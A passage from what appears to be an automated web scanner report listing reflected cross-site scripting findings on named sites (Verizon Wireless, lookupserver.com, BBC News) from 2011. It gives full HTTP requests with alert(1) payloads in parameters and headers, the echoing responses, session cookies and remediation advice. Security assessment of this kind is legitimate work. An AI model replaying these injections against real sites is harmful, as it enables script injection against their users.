This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632c68ab%3balert(1)//0c4b84ca3ab&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:02 GMT
Pragma: no-cache
Content-Length: 8100
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632c68ab;alert(1)//0c4b84ca3ab,1 ,false, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               docume
...[SNIP]...

3.183. http://www.verizonwireless.com/b2c/shoppingAssistant [quantity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9f547%3balert(1)//4aa1c76251f was submitted in the quantity parameter. This input was echoed as 9f547;alert(1)//4aa1c76251f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=19f547%3balert(1)//4aa1c76251f&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:02 GMT
Pragma: no-cache
Content-Length: 8019
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632,19f547;alert(1)//4aa1c76251f ,false, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               document
...[SNIP]...

3.184. http://lookupserver.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lookupserver.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 561e0<script>alert(1)</script>e04c3e53364 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: lookupserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)561e0<script>alert(1)</script>e04c3e53364
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Content-Length: 5703
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title
...[SNIP]...
<b>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)561e0<script>alert(1)</script>e04c3e53364</b>
...[SNIP]...

3.185. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7975'-alert(1)-'27a0b2dd17b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/from_our_own_correspondent/9538059.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d7975'-alert(1)-'27a0b2dd17b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:58 GMT
Keep-Alive: timeout=5, max=798
Expires: Mon, 18 Jul 2011 02:19:58 GMT
Connection: close
Content-Length: 66316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955598000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d7975'-alert(1)-'27a0b2dd17b',
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType: null,
       uri: '/2/hi/
...[SNIP]...

3.186. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 226c8'-alert(1)-'2bd0c895a29 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=226c8'-alert(1)-'2bd0c895a29

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:58 GMT
Keep-Alive: timeout=5, max=785
Expires: Mon, 18 Jul 2011 02:20:58 GMT
Connection: close
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955658000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=226c8'-alert(1)-'2bd0c895a29',
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType: null,
       uri: '/2/hi/
...[SNIP]...

3.187. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cycling/14179023.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca67'-alert(1)-'0cda5dc6319 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cycling/14179023.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dca67'-alert(1)-'0cda5dc6319

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:39 GMT
Keep-Alive: timeout=5, max=751
Expires: Mon, 18 Jul 2011 02:20:39 GMT
Connection: close
Content-Length: 57306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955639000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=dca67'-alert(1)-'0cda5dc6319',
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       uri: '/sport2/hi/cycli
...[SNIP]...

3.188. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/14168601.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49552'-alert(1)-'09ddbd65199 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/14168601.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=49552'-alert(1)-'09ddbd65199

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:42 GMT
Keep-Alive: timeout=5, max=775
Expires: Mon, 18 Jul 2011 02:20:42 GMT
Connection: close
Content-Length: 52099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955642000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=49552'-alert(1)-'09ddbd65199',
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       uri: '/sport2/hi/footba
...[SNIP]...

3.189. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/golf/14178214.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff3c'-alert(1)-'3ebf363b53f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/golf/14178214.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2ff3c'-alert(1)-'3ebf363b53f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:36 GMT
Keep-Alive: timeout=5, max=753
Expires: Mon, 18 Jul 2011 02:20:36 GMT
Connection: close
Content-Length: 56473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955636000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=2ff3c'-alert(1)-'3ebf363b53f',
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/sport2/hi/golf/141782
...[SNIP]...

3.190. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/motogp/14177052.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8569a'-alert(1)-'1ba42694830 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/motogp/14177052.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8569a'-alert(1)-'1ba42694830

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:43 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:43 GMT
Connection: close
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955643000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=8569a'-alert(1)-'1ba42694830',
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
       uri: '/sport2/hi/mot
...[SNIP]...

3.191. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe938'-alert(1)-'03d0b63c54f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fe938'-alert(1)-'03d0b63c54f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:40 GMT
Keep-Alive: timeout=5, max=776
Expires: Mon, 18 Jul 2011 02:20:40 GMT
Connection: close
Content-Length: 49436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955640000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fe938'-alert(1)-'03d0b63c54f',
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

3.192. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cycling/14179023.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a28c'-alert(1)-'1816b6df525 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cycling/14179023.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3a28c'-alert(1)-'1816b6df525

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:21:06 GMT
Keep-Alive: timeout=5, max=797
Expires: Mon, 18 Jul 2011 02:21:06 GMT
Connection: close
Content-Length: 57306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955666000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=3a28c'-alert(1)-'1816b6df525',
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       uri: '/sport2/hi/cycli
...[SNIP]...

3.193. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/14168601.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa85e'-alert(1)-'33ab69fc437 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/14168601.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fa85e'-alert(1)-'33ab69fc437

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:36 GMT
Keep-Alive: timeout=5, max=773
Expires: Mon, 18 Jul 2011 02:20:36 GMT
Connection: close
Content-Length: 52023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955636000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fa85e'-alert(1)-'33ab69fc437',
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       uri: '/sport2/hi/footba
...[SNIP]...

3.194. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/14178214.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a432b'-alert(1)-'9bd28bad69c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

